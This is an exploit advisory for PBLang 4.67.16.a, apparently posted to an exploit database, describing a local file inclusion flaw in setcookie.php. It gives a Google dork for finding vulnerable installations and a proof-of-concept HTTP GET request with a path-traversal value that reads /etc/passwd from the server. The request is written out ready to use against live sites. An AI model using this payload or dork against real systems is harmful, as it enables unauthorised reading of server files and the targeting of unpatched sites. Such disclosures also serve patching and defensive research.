||\\|| || || |-\\//-|____________ __________
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|| \\ || ||_______|| | |\\//| | | |_)|| |______ \ \_\/ /
||\\|| |_________| |_||_| |_____/ |________| \/_/ /_/
# Exploit Title:[PBLang local file include vulnerability]
# Google Dork:["Software PBLang 4.67.16.a"]
# Date: [12/03/2012]
# Author: ~Pseudo:[Number 7];
~ Twitter:[@TunisianSeven];
~ Blog: [http://tunisianseven.blogspot.com/]
# Software Link:[http://garr.dl.sourceforge.net/project/pblang/Full%20versions/PBLang%204.67.16.a%20no%20graphics/PBLang-4.67.16.a-nographics.zip]
# Version:[4.67.16.a]
# Tested on:[wINDOWS,Linux]
Proof of concept:
In setcookie.php
In order to successfully perform this attack the attacker must have
the full path where the files are uploaded, and it is easy to get
making a request like this:
GET http://localhost/path/setcookie.php?u=../../../../../etc/passwd HTTP/1.1
Cookie: eXtplorer=eRlQPZSWiGt2zRpFlXr6qCgja6DiLumU
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
For requests like this i use acunetix :D